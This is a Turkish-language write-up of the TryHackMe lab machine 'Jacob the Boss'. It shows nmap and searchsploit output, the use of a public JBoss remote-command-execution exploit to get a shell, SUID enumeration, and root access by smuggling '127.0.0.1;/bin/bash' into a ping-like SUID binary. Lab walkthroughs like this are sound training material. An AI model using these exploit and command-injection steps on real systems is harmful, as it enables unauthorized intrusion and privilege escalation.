TryHackMe – Jacob the Boss Makine Çözümü

Alper Karaca06 mins

Table of Contents

Merhabalar, bu yazımda sizlere TryHackMe platformunda bulunan “Jacob the Box” isimli makinenin çözümü anlatacağım. Keyifli Okumalar…

Çözüm

1 — İlk olarak alan adını ekliyorum.

[root:/home/alper/Desktop/TRYHACKME]# echo "10.10.60.225 jacobtheboss.box" | tee -a /etc/hosts
10.10.60.225 jacobtheboss.box

2 — Nmap aracını kullanarak makine üzerindeki açık portlar ve servisler hakkında detaylı bilgi ediniyorum.

[root:/home/alper/Desktop/TRYHACKME]# nmap -sS -sV 10.10.60.225
Starting Nmap 7.94 ( https://nmap.org ) at 2023-06-07 22:33 +03
Nmap scan report for jacobtheboss.box (10.10.60.225)
Host is up (0.068s latency).
Not shown: 987 closed tcp ports (reset)
PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 7.4 (protocol 2.0)
80/tcp   open  http        Apache httpd 2.4.6 ((CentOS) PHP/7.3.20)
111/tcp  open  rpcbind     2-4 (RPC #100000)
1090/tcp open  java-rmi    Java RMI
1098/tcp open  java-rmi    Java RMI
1099/tcp open  java-object Java Object Serialization
3306/tcp open  mysql       MariaDB (unauthorized)
4444/tcp open  java-rmi    Java RMI
4445/tcp open  java-object Java Object Serialization
4446/tcp open  java-object Java Object Serialization
8009/tcp open  ajp13       Apache Jserv (Protocol v1.3)
8080/tcp open  http        Apache Tomcat/Coyote JSP engine 1.1
8083/tcp open  http        JBoss service httpd

3 – 8080 portunda bir JBoss servisi çalıştığını görüyorum. Searchsploit üzerinden “jboss” aratarak uygun bir exploit bulmaya çalışıyorum.

[root:/home/alper/Desktop/TRYHACKME]# searchsploit "jboss"
------------------------------------------------------------------------------------ ---------------------------------
 Exploit Title                                                                      |  Path
------------------------------------------------------------------------------------ ---------------------------------
Apache Tomcat/JBoss EJBInvokerServlet / JMXInvokerServlet (RMI over HTTP) Marshalle | php/remote/28713.php
Cisco DCNM JBoss 10.4 - Credential Leakage                                          | java/remote/47885.txt
Cisco Security Monitoring Analysis and Response System JBoss - Command Execution    | hardware/remote/28245.pl
Cisco/Protego CS-MARS < 4.2.1 - 'JBoss' Remote Code Execution                       | hardware/remote/2048.pl
JBoss & JMX Console - Misconfigured Deployment Scanner                              | jsp/webapps/17924.pl
JBoss - DeploymentFileRepository WAR Deployment (via JMXInvokerServlet) (Metasploit | multiple/remote/21080.rb
JBoss - Java Class DeploymentFileRepository WAR Deployment (Metasploit)             | multiple/remote/16316.rb
JBoss 3.0.8/3.2.1 - HSQLDB Remote Command Injection                                 | multiple/remote/23221.txt
JBoss 3.x/4.0.2 - HTTP Request Remote Information Disclosure                        | multiple/remote/25842.txt
JBoss Application Server 4.2 < 4.2.0.CP09 / 4.3 < 4.3.0.CP08 - Remote Command Execu | jsp/webapps/16274.pl
JBoss AS 2.0 - Remote Command Execution                                             | windows/remote/17977.txt
JBoss AS 3/4/5/6 - Remote Command Execution                                         | multiple/webapps/36575.py
JBoss JMX - Console Beanshell Deployer WAR Upload and Deployment (Metasploit)       | multiple/remote/16319.rb
JBoss JMX - Console Deployer Upload and Execute (Metasploit)                        | multiple/remote/16318.rb
JBoss JMXInvokerServlet JMXInvoker 0.3 - Remote Command Execution                   | java/webapps/36553.java
JBoss Remoting 6.14.18 - Denial of Service                                          | multiple/dos/44099.txt
JBoss Seam 2 - Arbitrary File Upload / Execution (Metasploit)                       | jsp/remote/36653.rb
Red Hat JBoss EAP - Deserialization of Untrusted Data                               | java/webapps/40842.txt
Websphere/JBoss/OpenNMS/Symantec Endpoint Protection Manager - Java Deserialization | multiple/remote/44552.sh

[root:/home/alper/Desktop/TRYHACKME]# searchsploit -m 36575

4 — Exploiti çalıştırdıktan sonra bir shell elde ediyorum. Jacob kullanıcısının dizininde ilk bayrağımı buluyorum.

[root:/home/alper/Desktop/TRYHACKME]# python2.7 36575.py jacobtheboss.box:8080
*
*
[Type commands or "exit" to finish]
Shell> cat /home/jacob/user.txt
**CENSORED**

5 — Sudo yetkisi ile çalıştırılabilen ve SUID biti aktif komutları buluyorum. “/usr/bin/pingsys” adındaki bir komut dikkatimi çekiyor.

Shell> find / -perm -u=s -type f 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
/usr/bin/pingsys
*
*

6 — Bu komut “ping” komutu ile aynı işlevi görüyor. Bu komutu suistimal etmek için
“127.0.0.1;/bin/bash” şeklinde bir parametre veriyorum. Böylece root kullanıcısına geçiyorum. Root dizini altında ikinci bayrağı da elde ediyorum.

Related News